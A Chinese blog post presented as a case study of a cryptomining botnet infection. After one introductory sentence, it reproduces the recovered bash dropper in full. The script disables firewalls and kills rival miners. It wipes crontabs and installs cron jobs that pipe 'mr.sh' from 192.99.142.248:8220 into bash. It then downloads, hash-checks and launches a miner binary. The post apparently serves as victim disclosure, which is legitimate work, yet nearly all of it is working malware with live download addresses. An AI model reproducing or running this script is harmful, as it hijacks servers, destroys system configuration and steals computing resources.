挖矿肉鸡脚本案例分析
几天前,亲身经历了被攻击-成为挖矿肉鸡的经历,先将脚本部分公布。
1 #!/bin/bash 2 mkdir /var/tmp 3 chattr -i /usr/bin/wget 4 chmod 755 /usr/bin/wget 5 chattr -i /usr/bin/curl 6 chmod 755 /usr/bin/curl 7 /etc/init.d/iptables stop 8 service iptables stop 9 SuSEfirewall2 stop 10 reSuSEfirewall2 stop 11 pkill -f sysxlj 12 pkill -f jourxlv 13 pkill -f sustes 14 touch /etc/ld.so.preload 15 netstat -antp | grep '56415' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 16 netstat -antp | grep '139.99.120.75' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 17 rm -rf /usr/lib/void.so 18 rm -rf /etc/voidonce.sh 19 rm -rf /usr/local/lib/libjdk.so 20 rm -rf /usr/local/lib/libntp.so 21 ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9 22 sed -i '$d' /etc/crontab 23 rm -rf /lib64/library1.so 24 rm -rf /usr/lib64/library1.so 25 iptables -I OUTPUT -s 167.99.166.61 -j DROP 26 iptables -I INPUT -s 167.99.166.61 -j DROP 27 iptables -I OUTPUT -p tcp -m string --string "pastebin" --algo bm -j DROP 28 iptables -I OUTPUT -p udp -m string --string "pastebin" --algo kmp -j DROP 29 rm -rf /etc/cron.monthly/oanacroner 30 rm -rf /etc/cron.daily/oanacroner 31 rm -rf /etc/cron.hourly/oanacroner 32 rm -rf /usr/local/bin/dns 33 echo "" > /etc/crontab 34 echo "" > /etc/cron.d/root 35 echo "" > /etc/cron.d/apache 36 echo "" > /var/spool/cron/root 37 echo "" > /var/spool/cron/crontabs/root 38 chkconfig --del netdns 39 pkill -f netdns 40 echo "" > /etc/cron.d/system 41 chmod 777 /var/tmp 42 rm -rf /usr/local/bin/dns 43 rm -rf /usr/sbin/netdns 44 rm -rf /etc/init.d/netdns 45 rm -rf /etc/cron.monthly/oanacroner 46 rm -rf /etc/cron.daily/oanacroner 47 rm -rf /etc/cron.hourly/oanacroner 48 chattr -i /usr/local/lib/libntpd.so 49 chmod 777 /usr/local/lib/libntpd.so 50 rm -rf /usr/local/lib/libntpd.so 51 sed -i '/libntpd.so/d' /etc/ld.so.preload 52 crontab -l | sed '/pastebin.com/d' | crontab - 53 netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 54 netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 55 netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 56 netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 57 netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 58 netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 59 netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 60 netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 61 netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 62 pkill -f /usr/bin/.sshd 63 netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 64 rm -rf /var/tmp/j* 65 rm -rf /tmp/j* 66 rm -rf /var/tmp/java 67 rm -rf /tmp/java 68 rm -rf /var/tmp/java2 69 rm -rf /tmp/java2 70 rm -rf /var/tmp/java* 71 rm -rf /tmp/java* 72 chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3 73 chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate 74 rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate 75 rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik 76 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius 77 rm -rf /tmp/*index_bak* 78 rm -rf /tmp/*httpd.conf* 79 rm -rf /tmp/*httpd.conf 80 rm -rf /tmp/a7b104c270 81 rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas 82 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache 83 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 84 echo -e "*/1 * * * * root (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/root 85 echo -e "*/2 * * * * root (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh\n##" > /etc/cron.d/apache 86 echo -e "*/30 * * * * (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/root 87 mkdir -p /var/spool/cron/crontabs 88 echo -e "* * * * * (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh\n##" > /var/spool/cron/crontabs/root 89 mkdir -p /etc/cron.hourly 90 (curl -fsSL --connect-timeout 120 http://192.99.142.248:8220/11 -o /etc/cron.hourly/oanacroner1||http://192.99.142.248:8220/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1 91 chmod 777 /var/tmp/sustse 92 ps aux | grep -vw 'kworkerds\|sustse' | awk '{if($3>30.0) print $2}' | while read procid 93 do 94 kill -9 $procid 95 done 96 ps ax | grep /tmp/ | grep -v grep | grep -v 'kworkerds\|sustse\|kworkerds\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 97 ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'kworkerds\|sustse\|kworkerds\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 98 netstat -ant|grep '158.69.133.18:80\|192.99.142.249:3333\|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep 99 if [ $? -eq 0 ] 100 then 101 pwd 102 else 103 curl http://192.99.142.248:8220/2mr.sh | bash -sh 104 fi 105 sleep 2 106 netstat -ant|grep '158.69.133.18:80\|192.99.142.249:3333\|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep 107 if [ $? -eq 0 ] 108 then 109 pwd 110 else 111 curl http://192.99.142.248:8220/3mr.sh | bash -sh 112 fi 113 DIR="/var/tmp" 114 if [ -a "/var/tmp/sustse" ] 115 then 116 if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] 117 then 118 if [ -x "$(command -v md5sum)" ] 119 then 120 sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') 121 echo $sum 122 case $sum in 123 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) 124 echo "sustse OK" 125 ;; 126 *) 127 echo "sustse wrong" 128 pkill -f wc.conf 129 pkill -f sustse 130 sleep 4 131 ;; 132 esac 133 fi 134 echo "P OK" 135 else 136 DIR=$(mktemp -d)/var/tmp 137 mkdir $DIR 138 echo "T DIR $DIR" 139 fi 140 else 141 if [ -d "/var/tmp" ] 142 then 143 DIR="/var/tmp" 144 fi 145 echo "P NOT EXISTS" 146 fi 147 if [ -d "/var/tmp/sustse" ] 148 then 149 DIR=$(mktemp -d)/var/tmp 150 mkdir $DIR 151 echo "T DIR $DIR" 152 fi 153 WGET="wget -O" 154 if [ -s /usr/bin/curl ]; 155 then 156 WGET="curl -o"; 157 fi 158 if [ -s /usr/bin/wget ]; 159 then 160 WGET="wget -O"; 161 fi 162 f2="192.99.142.248:8220" 163 164 downloadIfNeed() 165 { 166 if [ -x "$(command -v md5sum)" ] 167 then 168 if [ ! -f $DIR/sustse ]; then 169 echo "File not found!" 170 download 171 fi 172 sum=$(md5sum $DIR/sustse | awk '{ print $1 }') 173 echo $sum 174 case $sum in 175 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) 176 echo "sustse OK" 177 ;; 178 *) 179 echo "sustse wrong" 180 sizeBefore=$(du $DIR/sustse) 181 if [ -s /usr/bin/curl ]; 182 then 183 WGET="curl -k -o "; 184 fi 185 if [ -s /usr/bin/wget ]; 186 then 187 WGET="wget --no-check-certificate -O "; 188 fi 189 #$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse 190 download 191 sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') 192 if [ -s /usr/bin/curl ]; 193 then 194 echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt 195 fi 196 ;; 197 esac 198 else 199 echo "No md5sum" 200 download 201 fi 202 } 203 204 download() { 205 if [ -x "$(command -v md5sum)" ] 206 then 207 sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') 208 echo $sum 209 case $sum in 210 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) 211 echo "sustse OK" 212 cp $DIR/sustse3 $DIR/sustse 213 ;; 214 *) 215 echo "sustse wrong" 216 download2 217 ;; 218 esac 219 else 220 echo "No md5sum" 221 download2 222 fi 223 } 224 225 download2() { 226 if [ `getconf LONG_BIT` = "64" ] 227 then 228 $WGET $DIR/sustse http://192.99.142.248:8220/tte2 229 fi 230 231 if [ -x "$(command -v md5sum)" ] 232 then 233 sum=$(md5sum $DIR/sustse | awk '{ print $1 }') 234 echo $sum 235 case $sum in 236 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) 237 echo "sustse OK" 238 cp $DIR/sustse $DIR/sustse3 239 ;; 240 *) 241 echo "sustse wrong" 242 ;; 243 esac 244 else 245 echo "No md5sum" 246 fi 247 } 248 249 judge() { 250 if [ ! "$(netstat -ant|grep '158.69.133.18:80\|192.99.142.249:3333\|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep)" ]; 251 then 252 ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid 253 do 254 kill -9 $procid 255 done 256 downloadIfNeed 257 touch /var/tmp/123 258 pkill -f /var/tmp/java 259 pkill -f w.conf 260 chmod +x $DIR/sustse 261 $WGET $DIR/wc.conf http://$f2/wt.conf 262 nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & 263 sleep 5 264 else 265 echo "Running" 266 fi 267 } 268 269 judge2() { 270 if [ ! "$(ps -fe|grep 'sustse'|grep 'wc.conf'|grep -v grep)" ]; 271 then 272 downloadIfNeed 273 chmod +x $DIR/sustse 274 $WGET $DIR/wc.conf http://$f2/wt.conf 275 nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & 276 sleep 5 277 else 278 echo "Running" 279 fi 280 } 281 282 if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; 283 then 284 judge2 285 else 286 judge 287 fi 288 289 if crontab -l | grep -q "192.99.142.248:8220" 290 then 291 echo "Cron exists" 292 else 293 crontab -r 294 echo "Cron not found" 295 LDR="wget -q -O -" 296 if [ -s /usr/bin/curl ]; 297 then 298 LDR="curl"; 299 fi 300 if [ -s /usr/bin/wget ]; 301 then 302 LDR="wget -q -O -"; 303 fi 304 (crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - 305 fi 306 rm -rf /var/tmp/jrm 307 rm -rf /tmp/jrm 308 pkill -f 185.222.210.59 309 pkill -f 95.142.40.81 310 pkill -f 158.69.133.18 311 chmod 777 /var/tmp/sustse 312 crontab -l | sed '/185.222.210.59/d' | crontab -View Code
更多精彩
